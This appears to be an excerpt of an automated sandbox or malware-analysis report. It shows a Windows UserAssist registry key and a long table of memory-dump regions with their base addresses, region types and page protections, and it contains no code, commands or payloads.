HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
There are 27 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
22E8E000
|
trusted library allocation
|
page read and write
|
|
|
|
221E3C09000
|
trusted library allocation
|
page read and write
|
|
|
|
5BC2000
|
trusted library allocation
|
page read and write
|
|
|
|
B869000
|
direct allocation
|
page execute and read and write
|
|
|
|
22EB1000
|
trusted library allocation
|
page read and write
|
|
|
|
22E61000
|
trusted library allocation
|
page read and write
|
|
|
|
8700000
|
direct allocation
|
page execute and read and write
|
|
|
|
2529E000
|
stack
|
page read and write
|
||
|
8670000
|
trusted library allocation
|
page read and write
|
||
|
2C5F000
|
stack
|
page read and write
|
||
|
2B3F1A3A000
|
heap
|
page read and write
|
||
|
8250000
|
trusted library allocation
|
page read and write
|
||
|
5060000
|
heap
|
page read and write
|
||
|
22EA1000
|
trusted library allocation
|
page read and write
|
||
|
4D7B000
|
stack
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
C7235FE000
|
stack
|
page read and write
|
||
|
2B3F1DAB000
|
heap
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
24EDA000
|
heap
|
page read and write
|
||
|
22D7D000
|
trusted library allocation
|
page read and write
|
||
|
255A000
|
trusted library allocation
|
page execute and read and write
|
||
|
819D000
|
stack
|
page read and write
|
||
|
701B000
|
stack
|
page read and write
|
||
|
94F7E4B000
|
stack
|
page read and write
|
||
|
7390000
|
direct allocation
|
page read and write
|
||
|
25390000
|
trusted library allocation
|
page read and write
|
||
|
221D56BA000
|
trusted library allocation
|
page read and write
|
||
|
7407000
|
heap
|
page read and write
|
||
|
4D6B000
|
stack
|
page read and write
|
||
|
254D000
|
trusted library allocation
|
page execute and read and write
|
||
|
25C20000
|
trusted library allocation
|
page read and write
|
||
|
24E66000
|
heap
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
22E00000
|
heap
|
page read and write
|
||
|
221D4469000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A32000
|
heap
|
page read and write
|
||
|
2E90000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
8470000
|
heap
|
page read and write
|
||
|
221EBC80000
|
heap
|
page read and write
|
||
|
20971A20000
|
heap
|
page read and write
|
||
|
76A0000
|
trusted library allocation
|
page read and write
|
||
|
2F4E000
|
stack
|
page read and write
|
||
|
22D6E000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
6D0F000
|
stack
|
page read and write
|
||
|
2E80000
|
trusted library allocation
|
page read and write
|
||
|
252E0000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1DA0000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A9A000
|
heap
|
page read and write
|
||
|
94F7077000
|
stack
|
page read and write
|
||
|
221D1BAA000
|
heap
|
page read and write
|
||
|
621000
|
unkown
|
page execute read
|
||
|
25340000
|
trusted library allocation
|
page read and write
|
||
|
627000
|
unkown
|
page readonly
|
||
|
73C2000
|
heap
|
page read and write
|
||
|
25337000
|
trusted library allocation
|
page read and write
|
||
|
2C7E000
|
stack
|
page read and write
|
||
|
2B3F1A1B000
|
heap
|
page read and write
|
||
|
221D3E3F000
|
trusted library allocation
|
page read and write
|
||
|
25460000
|
trusted library allocation
|
page read and write
|
||
|
621000
|
unkown
|
page execute read
|
||
|
25307000
|
trusted library allocation
|
page read and write
|
||
|
75CE000
|
stack
|
page read and write
|
||
|
221EBE1E000
|
heap
|
page read and write
|
||
|
10017F000
|
stack
|
page read and write
|
||
|
22C60000
|
heap
|
page read and write
|
||
|
621000
|
unkown
|
page execute read
|
||
|
25320000
|
trusted library allocation
|
page read and write
|
||
|
1C006800000
|
heap
|
page read and write
|
||
|
221D1AD0000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A9A000
|
heap
|
page read and write
|
||
|
C7236FE000
|
stack
|
page read and write
|
||
|
2BA0000
|
heap
|
page read and write
|
||
|
2ADD000
|
heap
|
page read and write
|
||
|
7360000
|
direct allocation
|
page read and write
|
||
|
20971BA0000
|
heap
|
page read and write
|
||
|
22E20000
|
heap
|
page execute and read and write
|
||
|
2850000
|
heap
|
page read and write
|
||
|
776B000
|
stack
|
page read and write
|
||
|
8720000
|
direct allocation
|
page read and write
|
||
|
6D9D000
|
stack
|
page read and write
|
||
|
48E0000
|
heap
|
page execute and read and write
|
||
|
74F0000
|
trusted library allocation
|
page read and write
|
||
|
221D1B6C000
|
heap
|
page read and write
|
||
|
8110000
|
trusted library allocation
|
page read and write
|
||
|
24E77000
|
heap
|
page read and write
|
||
|
221D37C0000
|
heap
|
page read and write
|
||
|
63D000
|
unkown
|
page readonly
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
221D1BB0000
|
heap
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
63D000
|
unkown
|
page readonly
|
||
|
627000
|
unkown
|
page readonly
|
||
|
2B3F19C0000
|
heap
|
page read and write
|
||
|
2AA0000
|
heap
|
page read and write
|
||
|
25C10000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
87B0000
|
direct allocation
|
page read and write
|
||
|
6E9E000
|
stack
|
page read and write
|
||
|
94F727E000
|
stack
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
94F6893000
|
stack
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
22950000
|
heap
|
page read and write
|
||
|
74E7000
|
trusted library allocation
|
page read and write
|
||
|
221E3970000
|
trusted library allocation
|
page read and write
|
||
|
22BAE000
|
stack
|
page read and write
|
||
|
C723EFB000
|
stack
|
page read and write
|
||
|
24EF7000
|
heap
|
page read and write
|
||
|
252F0000
|
trusted library allocation
|
page read and write
|
||
|
2EC0000
|
trusted library allocation
|
page read and write
|
||
|
2B3F38CD000
|
heap
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
7436000
|
heap
|
page read and write
|
||
|
221D3897000
|
heap
|
page read and write
|
||
|
1000FF000
|
stack
|
page read and write
|
||
|
23E59000
|
trusted library allocation
|
page read and write
|
||
|
7279000
|
heap
|
page read and write
|
||
|
24EAD000
|
heap
|
page read and write
|
||
|
2520000
|
trusted library allocation
|
page read and write
|
||
|
2289E000
|
stack
|
page read and write
|
||
|
44DF000
|
stack
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
4F4C000
|
stack
|
page read and write
|
||
|
2B3F1A4B000
|
heap
|
page read and write
|
||
|
4973000
|
trusted library allocation
|
page read and write
|
||
|
221D1BA5000
|
heap
|
page read and write
|
||
|
25350000
|
trusted library allocation
|
page execute and read and write
|
||
|
6E5E000
|
stack
|
page read and write
|
||
|
221D4433000
|
trusted library allocation
|
page read and write
|
||
|
5921000
|
trusted library allocation
|
page read and write
|
||
|
221D58EC000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
7680000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
25460000
|
trusted library allocation
|
page read and write
|
||
|
25320000
|
trusted library allocation
|
page read and write
|
||
|
7485000
|
heap
|
page read and write
|
||
|
3095000
|
heap
|
page read and write
|
||
|
221EBE00000
|
heap
|
page read and write
|
||
|
2AF5000
|
heap
|
page read and write
|
||
|
221EBCA4000
|
heap
|
page read and write
|
||
|
221D1B30000
|
heap
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A2E000
|
heap
|
page read and write
|
||
|
7340000
|
direct allocation
|
page read and write
|
||
|
221EBEFB000
|
heap
|
page read and write
|
||
|
7498000
|
heap
|
page read and write
|
||
|
2562000
|
trusted library allocation
|
page read and write
|
||
|
20971CA0000
|
heap
|
page read and write
|
||
|
2556000
|
trusted library allocation
|
page execute and read and write
|
||
|
7380000
|
direct allocation
|
page read and write
|
||
|
81DE000
|
stack
|
page read and write
|
||
|
3A60000
|
remote allocation
|
page execute and read and write
|
||
|
2B3F1A43000
|
heap
|
page read and write
|
||
|
221D5B0D000
|
trusted library allocation
|
page read and write
|
||
|
2AF7000
|
heap
|
page read and write
|
||
|
8130000
|
heap
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A52000
|
heap
|
page read and write
|
||
|
2565000
|
trusted library allocation
|
page execute and read and write
|
||
|
221D1BEE000
|
heap
|
page read and write
|
||
|
25C00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B78B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
2E74000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
27F0000
|
heap
|
page read and write
|
||
|
620000
|
unkown
|
page readonly
|
||
|
87A0000
|
direct allocation
|
page read and write
|
||
|
252F0000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
7370000
|
direct allocation
|
page read and write
|
||
|
2CE0000
|
heap
|
page read and write
|
||
|
7459000
|
heap
|
page read and write
|
||
|
221D1DF0000
|
trusted library allocation
|
page read and write
|
||
|
849C000
|
heap
|
page read and write
|
||
|
22A40000
|
remote allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
252F0000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1DAE000
|
heap
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
22D5E000
|
trusted library allocation
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
24EAD000
|
heap
|
page read and write
|
||
|
221D1C52000
|
heap
|
page read and write
|
||
|
25C10000
|
trusted library allocation
|
page read and write
|
||
|
22E31000
|
trusted library allocation
|
page read and write
|
||
|
7660000
|
heap
|
page read and write
|
||
|
7320000
|
direct allocation
|
page read and write
|
||
|
252FD000
|
trusted library allocation
|
page read and write
|
||
|
22D5B000
|
trusted library allocation
|
page read and write
|
||
|
2EA2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
|
2840000
|
heap
|
page read and write
|
||
|
25C10000
|
trusted library allocation
|
page read and write
|
||
|
7500000
|
trusted library allocation
|
page read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
2534D000
|
stack
|
page read and write
|
||
|
63D000
|
unkown
|
page readonly
|
||
|
22D50000
|
trusted library allocation
|
page read and write
|
||
|
221D3E6E000
|
trusted library allocation
|
page read and write
|
||
|
253D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B3F1DA9000
|
heap
|
page read and write
|
||
|
72B5000
|
heap
|
page read and write
|
||
|
4CEE000
|
stack
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
C7239FF000
|
stack
|
page read and write
|
||
|
25320000
|
trusted library allocation
|
page read and write
|
||
|
22EAD000
|
trusted library allocation
|
page read and write
|
||
|
94F71FE000
|
stack
|
page read and write
|
||
|
C723BFE000
|
stack
|
page read and write
|
||
|
2BA5000
|
heap
|
page read and write
|
||
|
81F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25B0000
|
heap
|
page read and write
|
||
|
94F6D7E000
|
stack
|
page read and write
|
||
|
221D42BB000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A92000
|
heap
|
page read and write
|
||
|
2567000
|
trusted library allocation
|
page execute and read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B856000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B3F1A58000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
221D5AF8000
|
trusted library allocation
|
page read and write
|
||
|
8EB0000
|
direct allocation
|
page execute and read and write
|
||
|
221D5A9A000
|
trusted library allocation
|
page read and write
|
||
|
221D448E000
|
trusted library allocation
|
page read and write
|
||
|
25C20000
|
trusted library allocation
|
page read and write
|
||
|
3148000
|
heap
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
87D0000
|
direct allocation
|
page read and write
|
||
|
221D5AF4000
|
trusted library allocation
|
page read and write
|
||
|
94F6C7E000
|
stack
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
47C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25320000
|
trusted library allocation
|
page read and write
|
||
|
7EFE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25457000
|
trusted library allocation
|
page read and write
|
||
|
221D552D000
|
trusted library allocation
|
page read and write
|
||
|
6FDE000
|
stack
|
page read and write
|
||
|
5BBC000
|
trusted library allocation
|
page read and write
|
||
|
4D2F000
|
stack
|
page read and write
|
||
|
625000
|
unkown
|
page readonly
|
||
|
527D000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
285C000
|
heap
|
page read and write
|
||
|
221D36F0000
|
heap
|
page read and write
|
||
|
2B3F1A5E000
|
heap
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
22C50000
|
trusted library allocation
|
page read and write
|
||
|
4908000
|
heap
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
7720000
|
trusted library allocation
|
page read and write
|
||
|
25C10000
|
trusted library allocation
|
page read and write
|
||
|
6DC0000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A52000
|
heap
|
page read and write
|
||
|
4780000
|
heap
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
2CD4000
|
heap
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
758E000
|
stack
|
page read and write
|
||
|
25340000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
|
221EBEAE000
|
heap
|
page read and write
|
||
|
2B3F1A8F000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
226BD000
|
stack
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
94F691E000
|
stack
|
page read and write
|
||
|
221D1BC6000
|
heap
|
page read and write
|
||
|
22AD0000
|
direct allocation
|
page read and write
|
||
|
2B3F1A84000
|
heap
|
page read and write
|
||
|
2B3F1A1D000
|
heap
|
page read and write
|
||
|
2B3F1A55000
|
heap
|
page read and write
|
||
|
8245000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B772000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1DAE000
|
heap
|
page read and write
|
||
|
2273D000
|
stack
|
page read and write
|
||
|
4B4E000
|
stack
|
page read and write
|
||
|
6DD5000
|
heap
|
page execute and read and write
|
||
|
625000
|
unkown
|
page readonly
|
||
|
47BE000
|
stack
|
page read and write
|
||
|
2B3F1A40000
|
heap
|
page read and write
|
||
|
252F0000
|
trusted library allocation
|
page read and write
|
||
|
24E6F000
|
heap
|
page read and write
|
||
|
5978000
|
trusted library allocation
|
page read and write
|
||
|
221D1AF0000
|
heap
|
page read and write
|
||
|
22E8C000
|
trusted library allocation
|
page read and write
|
||
|
7690000
|
trusted library allocation
|
page read and write
|
||
|
2F0E000
|
stack
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
7276000
|
heap
|
page read and write
|
||
|
94F6FFB000
|
stack
|
page read and write
|
||
|
71A8000
|
heap
|
page read and write
|
||
|
25F0000
|
heap
|
page read and write
|
||
|
25320000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A10000
|
heap
|
page read and write
|
||
|
22C4C000
|
stack
|
page read and write
|
||
|
2B3F1ACF000
|
heap
|
page read and write
|
||
|
221D4E8E000
|
trusted library allocation
|
page read and write
|
||
|
2EA5000
|
trusted library allocation
|
page execute and read and write
|
||
|
48AE000
|
stack
|
page read and write
|
||
|
2540F000
|
stack
|
page read and write
|
||
|
221D3984000
|
trusted library allocation
|
page read and write
|
||
|
24E30000
|
heap
|
page read and write
|
||
|
2A5C000
|
stack
|
page read and write
|
||
|
8730000
|
direct allocation
|
page read and write
|
||
|
4BAE000
|
stack
|
page read and write
|
||
|
221EBEED000
|
heap
|
page read and write
|
||
|
74A1000
|
heap
|
page read and write
|
||
|
25C20000
|
trusted library allocation
|
page read and write
|
||
|
7273000
|
heap
|
page read and write
|
||
|
25320000
|
trusted library allocation
|
page read and write
|
||
|
73C0000
|
direct allocation
|
page read and write
|
||
|
6CCE000
|
stack
|
page read and write
|
||
|
221D58C6000
|
trusted library allocation
|
page read and write
|
||
|
2525E000
|
stack
|
page read and write
|
||
|
73A0000
|
direct allocation
|
page read and write
|
||
|
221D1BF0000
|
heap
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
5019000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B826000
|
trusted library allocation
|
page read and write
|
||
|
C269000
|
direct allocation
|
page execute and read and write
|
||
|
25301000
|
trusted library allocation
|
page read and write
|
||
|
2570000
|
trusted library allocation
|
page execute and read and write
|
||
|
3039000
|
stack
|
page read and write
|
||
|
1C006860000
|
heap
|
page read and write
|
||
|
221D4415000
|
trusted library allocation
|
page read and write
|
||
|
94F6F76000
|
stack
|
page read and write
|
||
|
2B3F1A84000
|
heap
|
page read and write
|
||
|
25460000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A45000
|
heap
|
page read and write
|
||
|
221D5B1F000
|
trusted library allocation
|
page read and write
|
||
|
221D593A000
|
trusted library allocation
|
page read and write
|
||
|
221E3BF9000
|
trusted library allocation
|
page read and write
|
||
|
625000
|
unkown
|
page readonly
|
||
|
2B3F1DA8000
|
heap
|
page read and write
|
||
|
25311000
|
trusted library allocation
|
page read and write
|
||
|
3150000
|
heap
|
page read and write
|
||
|
22D56000
|
trusted library allocation
|
page read and write
|
||
|
482E000
|
stack
|
page read and write
|
||
|
620000
|
unkown
|
page readonly
|
||
|
73B0000
|
direct allocation
|
page read and write
|
||
|
22C78000
|
trusted library allocation
|
page read and write
|
||
|
C7234FA000
|
stack
|
page read and write
|
||
|
C723CFE000
|
stack
|
page read and write
|
||
|
7170000
|
heap
|
page read and write
|
||
|
2B3F1ABA000
|
heap
|
page read and write
|
||
|
7FFD9B7CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
7464000
|
heap
|
page read and write
|
||
|
25340000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
710E000
|
stack
|
page read and write
|
||
|
4F7E000
|
stack
|
page read and write
|
||
|
73B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
221D5518000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
627000
|
unkown
|
page readonly
|
||
|
25460000
|
trusted library allocation
|
page read and write
|
||
|
252F0000
|
trusted library allocation
|
page read and write
|
||
|
3310000
|
heap
|
page read and write
|
||
|
221D1E30000
|
heap
|
page read and write
|
||
|
8770000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
|
30FE000
|
stack
|
page read and write
|
||
|
1C006820000
|
heap
|
page read and write
|
||
|
620000
|
unkown
|
page readonly
|
||
|
70CE000
|
stack
|
page read and write
|
||
|
221EBE15000
|
heap
|
page read and write
|
||
|
7FFD9B773000
|
trusted library allocation
|
page execute and read and write
|
||
|
22940000
|
heap
|
page read and write
|
||
|
77EEDFE000
|
unkown
|
page read and write
|
||
|
86BE000
|
stack
|
page read and write
|
||
|
77EECFD000
|
stack
|
page read and write
|
||
|
2AEC000
|
heap
|
page read and write
|
||
|
7261000
|
heap
|
page read and write
|
||
|
221D1D60000
|
trusted library allocation
|
page read and write
|
||
|
25450000
|
trusted library allocation
|
page read and write
|
||
|
2EA0000
|
trusted library allocation
|
page read and write
|
||
|
2F60000
|
heap
|
page readonly
|
||
|
227EE000
|
stack
|
page read and write
|
||
|
20971B00000
|
heap
|
page read and write
|
||
|
256B000
|
trusted library allocation
|
page execute and read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
84E8000
|
heap
|
page read and write
|
||
|
6DD0000
|
heap
|
page execute and read and write
|
||
|
25340000
|
trusted library allocation
|
page read and write
|
||
|
22E00000
|
trusted library allocation
|
page read and write
|
||
|
221D58B3000
|
trusted library allocation
|
page read and write
|
||
|
25C10000
|
trusted library allocation
|
page read and write
|
||
|
22A7E000
|
stack
|
page read and write
|
||
|
8290000
|
trusted library allocation
|
page execute and read and write
|
||
|
221D5572000
|
trusted library allocation
|
page read and write
|
||
|
252F0000
|
trusted library allocation
|
page read and write
|
||
|
283E000
|
unkown
|
page read and write
|
||
|
25330000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B3F1A65000
|
heap
|
page read and write
|
||
|
221D1E38000
|
heap
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
25320000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A5F000
|
heap
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
23E96000
|
trusted library allocation
|
page read and write
|
||
|
6C8E000
|
stack
|
page read and write
|
||
|
20971E50000
|
heap
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1AD3000
|
heap
|
page read and write
|
||
|
94F717E000
|
stack
|
page read and write
|
||
|
1C008370000
|
heap
|
page read and write
|
||
|
2B3F1A1F000
|
heap
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
94F6DFE000
|
stack
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A3E000
|
heap
|
page read and write
|
||
|
2E89000
|
trusted library allocation
|
page read and write
|
||
|
221D1BB2000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
221E3BEB000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
7DF46B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C6E000
|
stack
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
2A98000
|
stack
|
page read and write
|
||
|
1C006A80000
|
heap
|
page read and write
|
||
|
760E000
|
stack
|
page read and write
|
||
|
221D5541000
|
trusted library allocation
|
page read and write
|
||
|
4FBE000
|
stack
|
page read and write
|
||
|
2B29000
|
heap
|
page read and write
|
||
|
2B5E000
|
stack
|
page read and write
|
||
|
22E8A000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
718F000
|
stack
|
page read and write
|
||
|
25460000
|
trusted library allocation
|
page read and write
|
||
|
8760000
|
direct allocation
|
page read and write
|
||
|
221E390F000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A45000
|
heap
|
page read and write
|
||
|
2799000
|
stack
|
page read and write
|
||
|
221D3E21000
|
trusted library allocation
|
page read and write
|
||
|
76D0000
|
trusted library allocation
|
page read and write
|
||
|
8800000
|
direct allocation
|
page read and write
|
||
|
7F070000
|
trusted library allocation
|
page execute and read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
84CE000
|
heap
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
25330000
|
trusted library allocation
|
page read and write
|
||
|
228DF000
|
stack
|
page read and write
|
||
|
94F7DCA000
|
stack
|
page read and write
|
||
|
22935000
|
heap
|
page read and write
|
||
|
22D6A000
|
trusted library allocation
|
page read and write
|
||
|
22A40000
|
remote allocation
|
page read and write
|
||
|
86FD000
|
stack
|
page read and write
|
||
|
22960000
|
heap
|
page read and write
|
||
|
221EBC60000
|
heap
|
page execute and read and write
|
||
|
221D1D40000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1A4C000
|
heap
|
page read and write
|
||
|
C723DFF000
|
stack
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
72B2000
|
heap
|
page read and write
|
||
|
82A0000
|
trusted library allocation
|
page read and write
|
||
|
221D3E51000
|
trusted library allocation
|
page read and write
|
||
|
4EBA000
|
stack
|
page read and write
|
||
|
22E94000
|
trusted library allocation
|
page read and write
|
||
|
4B2C000
|
stack
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
221E3901000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
221D3E2E000
|
trusted library allocation
|
page read and write
|
||
|
2A00000
|
heap
|
page read and write
|
||
|
2B3F38C3000
|
heap
|
page read and write
|
||
|
22E00000
|
trusted library allocation
|
page read and write
|
||
|
3C19000
|
remote allocation
|
page execute and read and write
|
||
|
2CB0000
|
heap
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
221D37C5000
|
heap
|
page read and write
|
||
|
24E6C000
|
heap
|
page read and write
|
||
|
2C3E000
|
stack
|
page read and write
|
||
|
2560000
|
trusted library allocation
|
page read and write
|
||
|
4EFC000
|
stack
|
page read and write
|
||
|
7670000
|
trusted library allocation
|
page read and write
|
||
|
25320000
|
trusted library allocation
|
page read and write
|
||
|
2550000
|
trusted library allocation
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
25312000
|
trusted library allocation
|
page read and write
|
||
|
47D0000
|
trusted library allocation
|
page read and write
|
||
|
25C10000
|
trusted library allocation
|
page read and write
|
||
|
221D54CC000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
25300000
|
trusted library allocation
|
page read and write
|
||
|
25330000
|
trusted library allocation
|
page read and write
|
||
|
7710000
|
trusted library allocation
|
page read and write
|
||
|
83CB000
|
stack
|
page read and write
|
||
|
22D76000
|
trusted library allocation
|
page read and write
|
||
|
20971B20000
|
heap
|
page read and write
|
||
|
25320000
|
trusted library allocation
|
page read and write
|
||
|
221D1B60000
|
heap
|
page read and write
|
||
|
2A8E000
|
stack
|
page read and write
|
||
|
5911000
|
trusted library allocation
|
page read and write
|
||
|
252FD000
|
trusted library allocation
|
page read and write
|
||
|
252F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
heap
|
page execute and read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
94F69DF000
|
stack
|
page read and write
|
||
|
4F3D000
|
stack
|
page read and write
|
||
|
24E4A000
|
heap
|
page read and write
|
||
|
80F7000
|
stack
|
page read and write
|
||
|
2B3F1AC3000
|
heap
|
page read and write
|
||
|
25C10000
|
trusted library allocation
|
page read and write
|
||
|
524D000
|
trusted library allocation
|
page read and write
|
||
|
8650000
|
trusted library allocation
|
page read and write
|
||
|
221EBCA0000
|
heap
|
page read and write
|
||
|
7279000
|
heap
|
page read and write
|
||
|
2B3F1A5E000
|
heap
|
page read and write
|
||
|
4911000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
20971E55000
|
heap
|
page read and write
|
||
|
2E40000
|
trusted library section
|
page read and write
|
||
|
3100000
|
heap
|
page read and write
|
||
|
25303000
|
trusted library allocation
|
page read and write
|
||
|
87C0000
|
direct allocation
|
page read and write
|
||
|
24EF4000
|
heap
|
page read and write
|
||
|
221D5936000
|
trusted library allocation
|
page read and write
|
||
|
30B0000
|
heap
|
page read and write
|
||
|
25360000
|
trusted library allocation
|
page read and write
|
||
|
764D000
|
stack
|
page read and write
|
||
|
252E0000
|
trusted library allocation
|
page read and write
|
||
|
25320000
|
trusted library allocation
|
page read and write
|
||
|
2B00000
|
heap
|
page read and write
|
||
|
7330000
|
direct allocation
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
25310000
|
trusted library allocation
|
page read and write
|
||
|
25C10000
|
trusted library allocation
|
page read and write
|
||
|
221D5500000
|
trusted library allocation
|
page read and write
|
||
|
3090000
|
heap
|
page read and write
|
||
|
252F0000
|
trusted library allocation
|
page read and write
|
||
|
2B3F1DAE000
|
heap
|
page read and write
|
||
|
22D4D000
|
stack
|
page read and write
|
||
|
72A2000
|
heap
|
page read and write
|
||
|
25330000
|
trusted library allocation
|
page read and write
|
||
|
2521D000
|
stack
|
page read and write
|
||
|
2B3F1AB0000
|
heap
|
page read and write
|
||
|
22D82000
|
trusted library allocation
|
